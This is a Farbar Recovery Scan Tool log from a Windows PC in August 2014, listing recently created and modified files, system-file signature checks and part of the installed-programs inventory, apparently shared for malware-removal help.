2014-08-02 19:25 - 2014-08-02 19:26 - 11188736 _____ (SurfRight B.V.) C:\Users\Ice\Downloads\HitmanPro_x64.exe
2014-08-02 19:24 - 2014-08-02 23:18 - 00000000 ____D () C:\AdwCleaner
2014-08-02 19:24 - 2014-08-02 19:24 - 01361309 _____ () C:\Users\Ice\Desktop\adwcleaner_3.302.exe
2014-08-02 19:19 - 2014-08-02 19:19 - 00000000 ____D () C:\Users\Ice\Desktop\Old Firefox Data
2014-08-02 19:04 - 2014-08-03 03:16 - 00000560 _____ () C:\Windows\setupact.log
2014-08-02 19:04 - 2014-08-02 19:04 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-02 17:21 - 2014-08-03 03:16 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-02 17:20 - 2014-08-02 17:20 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-02 17:20 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-02 17:06 - 2014-08-03 03:15 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Lavasoft
2014-08-02 16:59 - 2014-08-02 16:59 - 00000000 ____D () C:\ProgramData\BitDefender
2014-08-02 16:56 - 2014-08-02 16:56 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Weather Alerts
2014-08-02 16:55 - 2014-08-02 16:55 - 00000000 ____D () C:\Program Files\Lavasoft
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iPod
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files\Bonjour
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files (x86)\Bonjour
2014-07-26 20:05 - 2014-07-26 20:05 - 00003138 _____ () C:\Windows\System32\Tasks\{3189C8A5-3697-42A7-B610-24848AA251A5}
2014-07-23 15:29 - 2014-08-02 16:45 - 00000000 ____D () C:\ProgramData\1d41b52c7ef528a8
2014-07-23 15:29 - 2014-07-23 15:29 - 00000258 __RSH () C:\ProgramData\ntuser.pol
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Packages
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator
2014-07-22 16:24 - 2014-07-22 16:25 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-07-17 10:07 - 2014-07-17 10:07 - 00000000 ____D () C:\ProgramData\Riot Games
2014-07-12 01:26 - 2014-07-12 01:27 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:25 - 2014-07-12 01:25 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\bigfishgames_p215946498_s1_l1.exe
2014-07-11 22:37 - 2014-07-11 22:37 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Rainbow
2014-07-11 21:03 - 2014-07-11 21:04 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:02 - 2014-07-11 21:02 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Digital Quarter
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Goblin Kingdom
2014-07-11 19:45 - 2014-07-11 19:45 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Nevosoft
2014-07-11 15:44 - 2014-07-11 15:44 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\LestaStudio
2014-07-11 12:16 - 2014-07-11 12:16 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Program Files (x86)\Awakening - Moonfell Wood
2014-07-11 09:35 - 2014-07-11 09:36 - 00000000 ____D () C:\Program Files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:34 - 2014-07-11 09:35 - 00000000 ____D () C:\Program Files (x86)\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Program Files (x86)\Northern Tale
2014-07-11 09:31 - 2014-07-11 09:32 - 00000000 ____D () C:\Program Files (x86)\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\awakening-the-dreamless-castle_s1_l1_gF5471T1L1_d2331467785.exe
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:24 - 2014-07-11 09:25 - 00000000 ____D () C:\Program Files (x86)\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-03 04:10 - 2014-08-03 04:10 - 00009941 _____ () C:\Users\Ice\Desktop\FRST.txt
2014-08-03 04:10 - 2014-08-02 20:40 - 00000000 ____D () C:\FRST
2014-08-03 03:47 - 2014-02-22 16:24 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-03 03:39 - 2013-10-18 11:34 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-08-03 03:27 - 2014-03-21 02:19 - 00000000 ____D () C:\Users\Ice\Documents\My PSP8 Files
2014-08-03 03:26 - 2014-08-03 03:24 - 00012152 _____ () C:\Users\Ice\Desktop\dds.txt
2014-08-03 03:26 - 2014-08-03 03:24 - 00006754 _____ () C:\Users\Ice\Desktop\attach.txt
2014-08-03 03:23 - 2009-07-13 23:45 - 00021072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-03 03:23 - 2009-07-13 23:45 - 00021072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-03 03:19 - 2011-08-18 19:06 - 00997283 _____ () C:\Windows\WindowsUpdate.log
2014-08-03 03:17 - 2014-08-03 03:17 - 00000000 ____D () C:\Users\Ice\Desktop\New folder
2014-08-03 03:16 - 2014-08-02 19:04 - 00000560 _____ () C:\Windows\setupact.log
2014-08-03 03:16 - 2014-08-02 17:21 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-03 03:16 - 2014-02-22 16:26 - 00000000 ___RD () C:\Users\Ice\Google Drive
2014-08-03 03:16 - 2014-02-22 16:24 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-03 03:16 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-03 03:15 - 2014-08-02 17:06 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Lavasoft
2014-08-03 03:02 - 2014-08-03 03:02 - 00688992 ____R (Swearware) C:\Users\Ice\Desktop\dds.com
2014-08-02 23:24 - 2014-08-02 21:34 - 00029160 _____ () C:\Windows\SysWOW64\Drivers\TrueSight.sys
2014-08-02 23:22 - 2014-08-02 21:24 - 00065253 _____ () C:\Users\Ice\Desktop\Shortcut.txt
2014-08-02 23:22 - 2014-08-02 21:23 - 00032874 _____ () C:\Users\Ice\Desktop\Addition.txt
2014-08-02 23:19 - 2010-11-20 22:47 - 00273104 _____ () C:\Windows\PFRO.log
2014-08-02 23:18 - 2014-08-02 19:24 - 00000000 ____D () C:\AdwCleaner
2014-08-02 22:21 - 2013-06-19 20:26 - 00000000 ____D () C:\Users\Ice\AppData\Local\Deployment
2014-08-02 21:57 - 2014-08-02 21:57 - 00001924 _____ () C:\Users\Ice\Desktop\JRT.txt
2014-08-02 21:52 - 2014-08-02 21:52 - 00000000 ____D () C:\Windows\ERUNT
2014-08-02 21:51 - 2014-08-02 21:51 - 00012872 _____ (SurfRight B.V.) C:\Windows\system32\bootdelete.exe
2014-08-02 21:41 - 2014-08-02 21:41 - 00000000 ____D () C:\Users\Ice\AppData\Local\CrashDumps
2014-08-02 21:34 - 2014-08-02 21:34 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-08-02 21:34 - 2014-08-02 21:33 - 04806744 _____ () C:\Users\Ice\Desktop\RogueKiller.exe
2014-08-02 20:42 - 2009-07-14 00:32 - 00000000 ____D () C:\Windows\Performance
2014-08-02 20:41 - 2014-08-02 20:41 - 01016261 _____ (Thisisu) C:\Users\Ice\Desktop\JRT.exe
2014-08-02 20:41 - 2014-08-02 20:41 - 00000000 ____D () C:\Users\Ice\Desktop\RK_Quarantine
2014-08-02 20:40 - 2014-08-02 20:40 - 02094080 _____ (Farbar) C:\Users\Ice\Desktop\FarBar.exe
2014-08-02 20:21 - 2014-08-02 20:21 - 00005338 _____ () C:\Windows\system32\.crusader
2014-08-02 20:21 - 2014-08-02 19:26 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-02 19:28 - 2014-08-02 19:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
2014-08-02 19:28 - 2014-08-02 19:26 - 00001859 _____ () C:\Users\Public\Desktop\HitmanPro.lnk
2014-08-02 19:26 - 2014-08-02 19:26 - 00000000 ____D () C:\Program Files\HitmanPro
2014-08-02 19:26 - 2014-08-02 19:25 - 11188736 _____ (SurfRight B.V.) C:\Users\Ice\Downloads\HitmanPro_x64.exe
2014-08-02 19:24 - 2014-08-02 19:24 - 01361309 _____ () C:\Users\Ice\Desktop\adwcleaner_3.302.exe
2014-08-02 19:19 - 2014-08-02 19:19 - 00000000 ____D () C:\Users\Ice\Desktop\Old Firefox Data
2014-08-02 19:06 - 2013-06-07 22:08 - 00000000 ____D () C:\Users\Ice\Desktop\Current
2014-08-02 19:04 - 2014-08-02 19:04 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-02 17:20 - 2014-08-02 17:20 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-02-22 18:03 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Malwarebytes
2014-08-02 17:20 - 2014-02-22 18:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-02 17:18 - 2013-08-12 15:47 - 00000000 ____D () C:\Windows\Minidump
2014-08-02 17:05 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-08-02 16:59 - 2014-08-02 16:59 - 00000000 ____D () C:\ProgramData\BitDefender
2014-08-02 16:56 - 2014-08-02 16:56 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Weather Alerts
2014-08-02 16:55 - 2014-08-02 16:55 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-02 16:45 - 2014-07-23 15:29 - 00000000 ____D () C:\ProgramData\1d41b52c7ef528a8
2014-08-02 12:01 - 2013-06-07 19:50 - 00000422 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-08-02 12:00 - 2013-06-09 12:00 - 00003488 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-08-02 12:00 - 2013-06-07 19:50 - 00003446 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iPod
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files\Bonjour
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files (x86)\Bonjour
2014-07-27 14:39 - 2013-06-07 19:50 - 00000564 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-07-26 20:07 - 2013-08-22 07:18 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\SoftGrid Client
2014-07-26 20:07 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-07-26 20:06 - 2013-06-07 20:18 - 00001165 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-07-26 20:06 - 2013-06-07 19:50 - 00001449 _____ () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-26 20:06 - 2013-06-07 19:50 - 00001375 _____ () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-07-26 20:05 - 2014-07-26 20:05 - 00003138 _____ () C:\Windows\System32\Tasks\{3189C8A5-3697-42A7-B610-24848AA251A5}
2014-07-26 20:05 - 2014-01-17 23:51 - 00000000 ____D () C:\Users\Ice\AppData\Local\Battle.net
2014-07-26 20:05 - 2014-01-17 23:50 - 00000000 ____D () C:\Program Files (x86)\Battle.net
2014-07-26 01:00 - 2013-06-07 19:50 - 00004266 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-07-23 22:29 - 2014-01-17 23:51 - 00000000 ____D () C:\Program Files (x86)\Hearthstone
2014-07-23 15:33 - 2013-06-07 20:18 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-07-23 15:29 - 2014-07-23 15:29 - 00000258 __RSH () C:\ProgramData\ntuser.pol
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Packages
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator
2014-07-23 15:29 - 2014-02-22 16:24 - 00000000 ____D () C:\Users\Ice\AppData\Local\Google
2014-07-23 15:29 - 2014-02-22 16:24 - 00000000 ____D () C:\Program Files (x86)\Google
2014-07-23 15:29 - 2009-07-13 22:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-07-23 15:29 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\GroupPolicy
2014-07-23 15:02 - 2013-06-07 22:24 - 00000000 ____D () C:\Users\Ice\My Books
2014-07-22 16:25 - 2014-07-22 16:24 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-07-18 05:36 - 2011-08-18 19:22 - 00000000 ____D () C:\ProgramData\Temp
2014-07-17 10:07 - 2014-07-17 10:07 - 00000000 ____D () C:\ProgramData\Riot Games
2014-07-12 01:27 - 2014-07-12 01:26 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:25 - 2014-07-12 01:25 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\bigfishgames_p215946498_s1_l1.exe
2014-07-12 00:37 - 2013-08-30 23:27 - 00000000 ____D () C:\Program Files (x86)\Rush for Gold - Alaska
2014-07-11 22:37 - 2014-07-11 22:37 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Rainbow
2014-07-11 21:04 - 2014-07-11 21:03 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:02 - 2014-07-11 21:02 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Digital Quarter
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Goblin Kingdom
2014-07-11 19:45 - 2014-07-11 19:45 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Nevosoft
2014-07-11 15:44 - 2014-07-11 15:44 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\LestaStudio
2014-07-11 12:16 - 2014-07-11 12:16 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 11:40 - 2014-06-11 02:10 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Boomzap
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Program Files (x86)\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:35 - 00000000 ____D () C:\Program Files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:34 - 00000000 ____D () C:\Program Files (x86)\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Program Files (x86)\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:31 - 00000000 ____D () C:\Program Files (x86)\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\awakening-the-dreamless-castle_s1_l1_gF5471T1L1_d2331467785.exe
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:25 - 2014-07-11 09:24 - 00000000 ____D () C:\Program Files (x86)\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery
2014-07-11 00:16 - 2013-06-17 07:53 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Skype
2014-07-08 20:39 - 2013-10-18 11:34 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-07-08 20:39 - 2013-06-07 20:57 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-07-08 20:39 - 2011-08-18 19:08 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-07-08 13:47 - 2014-02-22 16:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2011-02-10 11:02

==================== End Of Log ============================

 

 

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-08-2014
Ran by Ice at 2014-08-03 04:11:09
Running from C:\Users\Ice\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 2.6.0.19120 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.3.153 - Adobe Systems, Inc.)
Allora and The Broken Portal (HKLM-x32\...\BFG-Allora and The Broken Portal) (Version:  - )
AMD Accelerated Video Transcoding (Version: 13.30.100.40417 - Advanced Micro Devices, Inc.) Hidden
AMD APP SDK Runtime (Version: 10.0.938.1 - Advanced Micro Devices Inc.) Hidden
AMD Catalyst Control Center (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AMD Drag and Drop Transcoding (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
AMD Media Foundation Decoders (Version: 1.0.81206.1620 - Advanced Micro Devices, Inc.) Hidden
AMD Wireless Display v3.0 (Version: 1.0.0.14 - Advanced Micro Devices, Inc.) Hidden
AMD Wireless Display v3.0 (Version: 1.0.0.15 - Advanced Micro Devices, Inc.) Hidden
Amulet of Time: Shadow of la Rochelle (HKLM-x32\...\BFG-Amulet of Time - Shadow of la Rochelle) (Version:  - )
